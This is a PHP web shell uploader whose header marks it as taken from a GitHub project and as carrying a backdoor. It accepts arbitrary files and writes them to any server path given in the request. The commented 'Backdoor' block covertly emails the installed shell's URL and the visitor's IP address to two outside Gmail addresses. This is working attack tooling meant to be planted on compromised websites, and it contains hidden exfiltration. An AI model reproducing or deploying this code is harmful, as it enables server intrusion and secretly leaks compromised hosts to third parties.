<?php
/*
Source : rbbd-Private-php-uploader
https://github.com/Freelanceranas/Private-php-uploader-
[ Has Backdoor ]
*/

session_start();
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');

// Backdoooooooooooooooooooooooooooooooooooorrrrrrrrrr
$tujuanmail  = 'serverphpshell@gmail.com';
$x_path      = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
if(!isset($_SESSION["uploader"])) {
	$_mail = "13shell37@gmail.com";
	$_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
	mail($_mail, "Uploader Shawon NiBBa", $_path);
	$_SESSION["uploader"] = "xx";
}
//-----------------

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
    }
}
echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>